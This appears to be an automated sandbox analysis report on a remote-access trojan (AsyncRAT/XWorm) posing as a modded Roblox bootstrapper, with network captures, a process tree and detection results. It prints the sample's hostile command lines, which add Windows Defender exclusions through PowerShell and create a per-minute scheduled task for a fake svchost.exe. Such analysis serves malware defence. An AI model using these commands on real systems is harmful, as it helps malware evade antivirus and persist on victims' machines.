                                                                                                                                                                                                                                            2024-12-01 19:08:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.849709104.21.93.274437424C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-01 19:08:04 UTC56OUTGET /api/endpoint.json HTTP/1.1
                                                                                                                                                                                                                                            Host: getsolara.dev
                                                                                                                                                                                                                                            2024-12-01 19:08:04 UTC1052INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sun, 01 Dec 2024 19:08:04 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                            Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                            ETag: W/"94670152d340e6e41e0e564b886ac5d4"
                                                                                                                                                                                                                                            referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nu%2B6qumAtsUPCJX78XkcodXPUnvTDde8fxGWEPN%2F7EjJTv%2BUdJwi8jLCYnBvtT%2BW4HKyJ5fYwtD%2BzyJ2D8%2Bq2KgyLYnhuP7xW8EJ4YkPTvPD8zSlyBw90RWmP5%2Bdl7cd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=0
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8eb55d218ffc8ca7-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2022&rtt_var=778&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2811&recv_bytes=694&delivery_rate=1388492&cwnd=128&unsent_bytes=0&cid=3c926f666f05df84&ts=496&x=0"
                                                                                                                                                                                                                                            2024-12-01 19:08:04 UTC317INData Raw: 32 31 34 0d 0a 7b 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 32 33 22 2c 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 38 61 61 33 36 62 62 66 30 65 62 31 34 39 34 61 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 33 30 22 2c 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 38 30 34 39 63 30 30 36 2e 73 6f 6c 61 72 61 77 65 62 2d 61 6c 6a 2e 70 61 67 65 73 2e 64 65 76 2f 64 6f 77 6e 6c 6f 61 64 2f 73 74 61 74 69 63 2f 66 69 6c 65 73 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73
                                                                                                                                                                                                                                            Data Ascii: 214{ "BootstrapperVersion": "1.23", "SupportedClient": "version-8aa36bbf0eb1494a", "SoftwareVersion": "3.130", "BootstrapperUrl": "https://8049c006.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe", "SoftwareUrl":"https
                                                                                                                                                                                                                                            2024-12-01 19:08:04 UTC222INData Raw: 72 61 2e 44 69 72 2e 7a 69 70 22 2c 0a 20 20 20 20 22 56 65 72 73 69 6f 6e 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 6c 69 65 6e 74 73 65 74 74 69 6e 67 73 2e 72 6f 62 6c 6f 78 2e 63 6f 6d 2f 76 32 2f 63 6c 69 65 6e 74 2d 76 65 72 73 69 6f 6e 2f 57 69 6e 64 6f 77 73 50 6c 61 79 65 72 2f 63 68 61 6e 6e 65 6c 2f 6c 69 76 65 22 2c 0a 20 20 20 20 22 43 6c 69 65 6e 74 48 61 73 68 22 3a 22 36 62 38 65 38 34 38 34 37 64 38 66 31 37 35 39 32 65 39 66 37 34 63 62 36 34 33 31 65 32 35 32 30 35 66 62 65 65 30 64 31 36 39 39 66 30 62 35 39 39 33 31 39 64 33 39 66 65 38 31 37 34 64 64 22 2c 0a 20 20 20 20 22 43 68 61 6e 67 65 6c 6f 67 22 3a 22 5b 2b 5d 22 0a 7d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ra.Dir.zip", "VersionUrl":"https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live", "ClientHash":"6b8e84847d8f17592e9f74cb6431e25205fbee0d1699f0b599319d39fe8174dd", "Changelog":"[+]"}
                                                                                                                                                                                                                                            2024-12-01 19:08:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.849710128.116.119.34437424C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-01 19:08:06 UTC119OUTGET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
                                                                                                                                                                                                                                            Host: clientsettings.roblox.com
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            2024-12-01 19:08:07 UTC576INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            content-length: 119
                                                                                                                                                                                                                                            content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                            date: Sun, 01 Dec 2024 19:08:06 GMT
                                                                                                                                                                                                                                            server: Kestrel
                                                                                                                                                                                                                                            cache-control: no-cache
                                                                                                                                                                                                                                            strict-transport-security: max-age=3600
                                                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                            roblox-machine-id: bf12527b-168a-5de4-50e5-c7d8d99b2ea9
                                                                                                                                                                                                                                            x-roblox-region: us-central_rbx
                                                                                                                                                                                                                                            x-roblox-edge: lhr2
                                                                                                                                                                                                                                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
                                                                                                                                                                                                                                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
                                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                                            2024-12-01 19:08:07 UTC119INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 35 32 2e 30 2e 36 35 32 30 37 36 34 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 38 61 61 33 36 62 62 66 30 65 62 31 34 39 34 61 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 30 2c 20 36 35 32 30 37 36 34 22 7d
                                                                                                                                                                                                                                            Data Ascii: {"version":"0.652.0.6520764","clientVersionUpload":"version-8aa36bbf0eb1494a","bootstrapperVersion":"1, 6, 0, 6520764"}


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.849711104.20.22.464437424C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-01 19:08:11 UTC99OUTGET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
                                                                                                                                                                                                                                            Host: www.nodejs.org
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            2024-12-01 19:08:11 UTC497INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                            Date: Sun, 01 Dec 2024 19:08:11 GMT
                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                            location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            x-vercel-id: cle1::j8hhv-1733080091506-13766746dbe7
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8eb55d49e90b0cba-EWR
                                                                                                                                                                                                                                            2024-12-01 19:08:11 UTC20INData Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fRedirecting...
                                                                                                                                                                                                                                            2024-12-01 19:08:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:14:07:56
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\sDKRz09zM7.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\sDKRz09zM7.exe"
                                                                                                                                                                                                                                            Imagebase:0xc60000
                                                                                                                                                                                                                                            File size:782'848 bytes
                                                                                                                                                                                                                                            MD5 hash:6C06275582DB133A429E4149C0F1AC21
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                                            Start time:14:07:57
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\not rat.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\not rat.exe"
                                                                                                                                                                                                                                            Imagebase:0xdf0000
                                                                                                                                                                                                                                            File size:42'496 bytes
                                                                                                                                                                                                                                            MD5 hash:270675071F6FA1DFAA122B58BC45D9AB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2621953796.0000000003081000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\not rat.exe, Author: ditekSHen
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                            • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:14:07:57
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe"
                                                                                                                                                                                                                                            Imagebase:0x22ec9d70000
                                                                                                                                                                                                                                            File size:730'112 bytes
                                                                                                                                                                                                                                            MD5 hash:EDBE7F367BE35F4D0702F81FC432C9EC
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 75%, ReversingLabs
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                            Start time:14:07:57
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                            Start time:14:08:02
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'
                                                                                                                                                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                            Start time:14:08:02
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                            Start time:14:08:09
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'not rat.exe'
                                                                                                                                                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                            Start time:14:08:09
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                            Start time:14:08:11
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                            Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                            Start time:14:08:11
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424
                                                                                                                                                                                                                                            Imagebase:0x7ff76aaf0000
                                                                                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                            Start time:14:08:12
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\WerFault.exe -u -p 7424 -s 2180
                                                                                                                                                                                                                                            Imagebase:0x7ff76aaf0000
                                                                                                                                                                                                                                            File size:570'736 bytes
                                                                                                                                                                                                                                            MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                            Start time:14:08:16
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                            Imagebase:0x7ff67e6d0000
                                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                            Start time:14:08:24
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                                                                                                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                            Start time:14:08:24
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                            Start time:14:08:47
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                                                                                                                                                                            Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                            Start time:14:08:47
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                            Start time:14:09:12
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff7b7180000
                                                                                                                                                                                                                                            File size:235'008 bytes
                                                                                                                                                                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                            Start time:14:09:12
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                            Start time:14:09:13
                                                                                                                                                                                                                                            Start date:01/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                                                                                                                                                                                            Imagebase:0x5e0000
                                                                                                                                                                                                                                            File size:42'496 bytes
                                                                                                                                                                                                                                            MD5 hash:270675071F6FA1DFAA122B58BC45D9AB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
